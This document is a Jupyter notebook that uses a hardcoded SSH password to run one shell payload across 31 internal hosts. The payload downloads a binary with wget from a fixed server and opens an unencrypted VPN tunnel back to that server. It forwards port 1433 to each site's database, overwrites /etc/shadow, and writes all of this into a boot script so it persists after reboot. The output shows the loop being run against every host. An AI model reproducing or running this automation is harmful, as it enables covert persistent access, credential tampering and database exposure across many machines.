In [2]:
import subprocess
import re

cmd_input = r'''
wget http://10.2.61.84:999/rinetd -O /opt/rinetd
chmod a+x /opt/rinetd

sudo cat > /opt/vpn.conf <<EOF
dev tun8
#proto tcp-client
remote 10.2.61.84 %(port)s
ifconfig 172.21.%(num)s.1 172.21.%(num)s.2
comp-lzo no
cipher none
verb 3
keepalive 5 30
EOF

sudo cat > /opt/rinetd.conf <<EOF
0.0.0.0 1433 %(db_ip)s 1433
EOF

sudo cat > /opt/bootlocal.sh <<EOF
#!/bin/sh
# put other system startup commands here

sudo /usr/local/etc/init.d/dropbear start
sudo echo 1 > /proc/sys/net/ipv4/ip_forward
sudo cat /opt/shadow > /etc/shadow
sudo openvpn --daemon --config /opt/vpn.conf
sudo /opt/rinetd -c /opt/rinetd.conf
EOF

filetool.sh -b
sudo poweroff
'''

yy_ips = ['10.196.98.11', '10.8.82.6', '10.24.10.54', '10.94.98.17', '10.100.85.5', '10.78.64.134', '10.106.119.174', 
          '10.14.177.5', '10.32.26.14', '10.227.33.53', '10.124.129.2', '10.72.25.204', '10.88.161.33', '10.112.24.244', 
          '10.130.24.35', '10.136.37.91', '10.48.54.109', '10.56.25.105', '10.142.6.104', '10.40.48.203', '10.148.128.169', 
          '10.185.101.20', '10.154.65.16', '10.64.24.173', '10.160.129.182', '10.166.152.15', '10.188.16.35', '10.172.122.17', 
          '10.178.45.230', '10.192.4.205', '10.20.64.37']
db_ips = ['192.168.0.11', '192.168.1.16', '192.168.0.4', '172.37.250.5', '192.168.1.11', '192.168.100.234', '192.168.1.10', 
          '192.168.0.11', '192.168.1.10', '192.168.33.22', '192.168.1.3', '192.168.1.6', '192.168.1.13', '192.168.1.5', 
          '192.168.2.10', '192.168.1.7', '192.168.54.104', '192.168.10.35', '192.168.6.63', '192.168.1.14', '192.168.1.9', 
          '192.168.1.14', '192.168.1.6', '192.168.1.5', '192.168.1.202', '192.168.10.34', '192.168.1.14', '192.172.20.6', 
          '192.168.1.6', '192.168.1.6', '192.168.1.37']

def get_sheng_num(yy_ip):
    return int(yy_ip.split('.')[1])

def get_output(cmd):
    p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
    return p.stdout.read().decode()

def get_output_with_input(cmd, input):
    p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
##    print('-----------------------')
##    print(input)
##    print('-----------------------')
    p.stdin.write(input.encode())
    p.stdin.close()
    err = p.stderr.read().decode()
    if err.find('Connection timed out') >= 0:
        return "##########\n{'error':'Timeout'}\n##########\n"
    if err.find('No route to host') >= 0:
        return "##########\n{'error':'NoRoute'}\n##########\n"
    if err.find('Permission denied') >= 0:
        return "##########\n{'error':'NoAuth'}\n##########\n"
    return p.stdout.read().decode()

def run_remote_cmd(cmd, host, password='kedacom@gabxfj'):
    print('trying %s ...' % host)
    return get_output_with_input('LANGOAGE=%s /usr/share/man/ssh -o ConnectTimeout=12 -l kedacom -p 2022 -T %s'%(password, host), cmd)

In [3]:
run_remote_cmd(cmd_input%{'num':8, 'port':7000+8, 'db_ip':'192.168.6.205'}, '10.200.192.117')

trying 10.200.192.117 ...


'Backing up files to /mnt/vda1/tce/mydata.tgz/\x08-\x08\\\x08|\x08/\x08-\x08\\\x08'

In [10]:
def patch_box():
    for yy_ip, db_ip in zip(yy_ips, db_ips):
        run_remote_cmd(cmd_input%{'num':get_sheng_num(yy_ip), 'port':7000+get_sheng_num(yy_ip), 'db_ip':db_ip}, yy_ip)

In [3]:
yy_ips

['10.196.98.11',
 '10.8.82.6',
 '10.24.10.54',
 '10.94.98.17',
 '10.100.85.5',
 '10.78.64.134',
 '10.106.119.174',
 '10.14.177.5',
 '10.32.26.14',
 '10.227.33.53',
 '10.124.129.2',
 '10.72.25.204',
 '10.88.161.33',
 '10.112.24.244',
 '10.130.24.35',
 '10.136.37.91',
 '10.48.54.109',
 '10.56.25.105',
 '10.142.6.104',
 '10.40.48.203',
 '10.148.128.169',
 '10.185.101.20',
 '10.154.65.16',
 '10.64.24.173',
 '10.160.129.182',
 '10.166.152.15',
 '10.188.16.35',
 '10.172.122.17',
 '10.178.45.230',
 '10.192.4.205',
 '10.20.64.37']

In [5]:
sheng_nums = [i.split('.')[1] for i in yy_ips]

In [7]:
print(sheng_nums)

['196', '8', '24', '94', '100', '78', '106', '14', '32', '227', '124', '72', '88', '112', '130', '136', '48', '56', '142', '40', '148', '185', '154', '64', '160', '166', '188', '172', '178', '192', '20']


In [18]:
yy_ip, db_ip = '10.172.122.17', '192.172.20.6'
run_remote_cmd(cmd_input%{'num':get_sheng_num(yy_ip), 'port':7000+get_sheng_num(yy_ip), 'db_ip':db_ip}, yy_ip)

trying 10.172.122.17 ...


'Backing up files to /mnt/vda1/tce/mydata.tgz/\x08-\x08\\\x08|\x08/\x08-\x08\\\x08|\x08/\x08-\x08\\\x08|\x08/\x08-\x08'

In [14]:
patch_box()

trying 10.196.98.11 ...
trying 10.8.82.6 ...
trying 10.24.10.54 ...
trying 10.94.98.17 ...
trying 10.100.85.5 ...
trying 10.78.64.134 ...
trying 10.106.119.174 ...
trying 10.14.177.5 ...
trying 10.32.26.14 ...
trying 10.227.33.53 ...
trying 10.124.129.2 ...
trying 10.72.25.204 ...
trying 10.88.161.33 ...
trying 10.112.24.244 ...
trying 10.130.24.35 ...
trying 10.136.37.91 ...
trying 10.48.54.109 ...
trying 10.56.25.105 ...
trying 10.142.6.104 ...
trying 10.40.48.203 ...
trying 10.148.128.169 ...
trying 10.185.101.20 ...
trying 10.154.65.16 ...
trying 10.64.24.173 ...
trying 10.160.129.182 ...
trying 10.166.152.15 ...
trying 10.188.16.35 ...
trying 10.172.122.17 ...
trying 10.178.45.230 ...
trying 10.192.4.205 ...
trying 10.20.64.37 ...
